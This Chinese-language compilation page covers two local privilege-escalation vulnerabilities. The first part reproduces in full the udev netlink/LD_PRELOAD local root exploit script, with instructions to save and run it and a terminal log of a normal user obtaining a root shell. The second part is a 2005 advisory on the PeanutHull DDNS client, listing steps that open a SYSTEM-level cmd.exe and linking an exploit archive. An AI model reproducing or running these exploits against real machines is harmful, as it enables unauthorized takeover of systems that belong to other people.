udev漏洞提升(精选2篇)
udev漏洞提升 篇1
暴露出udev权限提示的漏洞,只要有普通用户权限,即可提升到root权限,实验了一把,果真很容易提升,
把下面代码保存为test.sh文件
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in
# tested on debian-etch,ubuntu,gentoo
# do a ‘cat /proc/net/netlink’
# and set the first arg to this
# script. to the pid of the netlink socket
# (the pid is udevd_pid C 1 most of the time)
# + sploit has to be UNIX formatted text
# + if it doesn’t work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, “add”);
sprintf(subsystem, “block”);
sprintf(sysfspath, “/dev/foo”);
sprintf(major, “8″);
sprintf(minor, “1″);
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, “%s@%s”, event, sysfspath) +1;
mp += sprintf(mp, “ACTION=%s”, event) +1;
mp += sprintf(mp, “DEVPATH=%s”, sysfspath) +1;
mp += sprintf(mp, “MAJOR=%s”, major) +1;
mp += sprintf(mp, “MINOR=%s”, minor) +1;
mp += sprintf(mp, “SUBSYSTEM=%s”, subsystem) +1;
mp += sprintf(mp, “LD_PRELOAD=/tmp/libno_ex.so.1.0″) +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
// execl(”/tmp/suid”, “suid”, (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include
#include
#include
#include
#include
void _init
{
setgid(0);
setuid(0);
unsetenv(”LD_PRELOAD”);
// execl(”/bin/sh”,”sh”,”-c”,”chown root:root /tmp/suid; chmod +s /tmp/suid”,NULL);
chown(”/tmp/suid”,0,0);
chmod(”/tmp/suid”,S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
execl(”/bin/sh”,”sh”,0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
然后执行几个简单操作即可由普通用户提升至root了
[test@sbear-cn test]$ id
uid=500(test) gid=500(test) groups=500(test)
[test@sbear-cn test]$ ps -ef|grep udev
root 502 1 0 13:04 ? 00:00:00 /sbin/udevd -d //查看目前udevd服务的id号
test 2635 2564 0 13:07 pts/0 00:00:00 grep udev
[test@sbear-cn test]$ sh test.sh 501 //udevd的id号减1,即502-1 = 501
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.2# id
uid=0(root) gid=0(root) groups=500(test) //获取到root权限了
sh-3.2# ls /root/
anaconda-ks.cfg
sh-3.2#
赶紧升级你的udev吧
www.milw0rm.com/exploits/8478
udev漏洞提升 篇2
PeanutHull<=3.0.1.0
综述:
网域科技号称全球最大的DDNS(动态域名)提供商,
花生壳是它们提供的客户端
详细信息,可以查看www.oray.net
具体细节:
该漏洞主要是由于花生壳客户端系统图标没有正确的丢弃SYSTEM权限。
本地非特权用户可以通过访问系统图标来以SYSTEM权限执行任意命令。
Exploit:
1.双击任务栏花生壳图标,打开花生壳窗口
2.单击“帮助”,打开“论坛”
3.在跳出的IE地址栏中输入C:
4.切换到%WINDIR%System32
5.单击打开cmd.exe
6.此时打开的cmd.exe以SYSTEM权限运行
成功利用此漏洞可以获取SYSTEM权限
厂商回复:
.07.13通过EMAIL通知厂商,
2005.07.14厂商回复称将在3.0正式版中修复这个问题
2005.07.20花生壳3.0正式版发布
2005.07.20此公告发布
更新:
Secunia在验证此漏洞时的发现,最新的3.0.1.0版依然存在此缺陷。
本地用户可以通过发送SW_SHOW消息来调出花生壳窗口,进而提升权限。
2005.07.21测试代码公布
Exploit:
secway.org/exploit/PeanutHull_Local.rar
或者见附件
解决方案:
暂无
请时刻关注网域科技的补丁
【udev漏洞提升】推荐阅读:
漏洞管理05-23
防护漏洞09-03
DedeCMS会员中心书签管理SQL注射漏洞漏洞预警05-12
漏洞分析06-26
微软下周二将发布7个补丁 修复windows漏洞Windows漏洞06-09
蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警06-03
漏洞扫描器06-08
网络协议漏洞挖掘06-18